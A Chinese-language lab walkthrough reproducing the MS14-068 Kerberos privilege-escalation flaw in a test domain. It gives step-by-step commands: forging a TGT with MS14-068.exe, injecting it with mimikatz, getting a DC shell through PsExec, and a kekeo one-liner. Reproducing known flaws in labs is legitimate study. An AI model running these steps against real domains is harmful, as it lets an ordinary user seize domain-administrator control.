MS14-068域权限提升漏洞复现


0x00前言

MS14-068漏洞可以将域内任何一个普通用户提升至域管理员权限。微软给出的补丁是KB3011780,在server 2000以上的域控服务器中,只要没有添加这个补丁,都可引发极大的危害。

0x01漏洞复现

漏洞原理

服务票据是客户端直接发送给服务器,并请求服务资源,如果服务器没用向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。

漏洞利用前提

域控没有打ms14-068的补丁(KB3011780)

攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码或者hash,以及域用户的suid

环境搭建

域控制器(DC):win server2008 10.10.10.10

域内机器:win7 10.10.10.20

漏洞复现

查询域控机器是否存在该补丁

 systeminfo或者systeminfo  |findstr  "3011780"

TKmkaq.png

在win7上面使用普通域用户登录。
测试访问域控的C盘共享,访问被拒。

 dir  \\10.10.10.10\c$

TKJKVU.png

清空票据

 kerberos::purge   //清空已有票据
 kerberos::list    //查看票据

TKcaee.png

查看本机的用户ID

 whoami  /all

TKcWwQ.png

使用ms14-068.exe提权工具生成伪造的TGT票据

 MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

TKf94H.png

使用mimikatz写入TGT票据,

 kerberos::ptc TGT_test@test.com.ccache

TKfqIg.png

使用PSTools目录下的PsExec.exe获取shell,#psexec.exe以管理员权限运行连接域控

TMpRnf.png

使用kekeo工具
exploit::ms14068  /domain:test.com  /user:test  /password:123.com /ptt 

TK7RmR.png

攻击者如何利用该漏洞:

通过身份验证的域用户可以向Kerberos KDC发出伪造的Kerberos票证,声明该用户就是域管理员权限。Kerberos KDC在处理来自攻击者的请求时,会不恰当地验证伪造的票证签名,从而让攻击者能利用域管理员的身份来访问网络上的资源。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM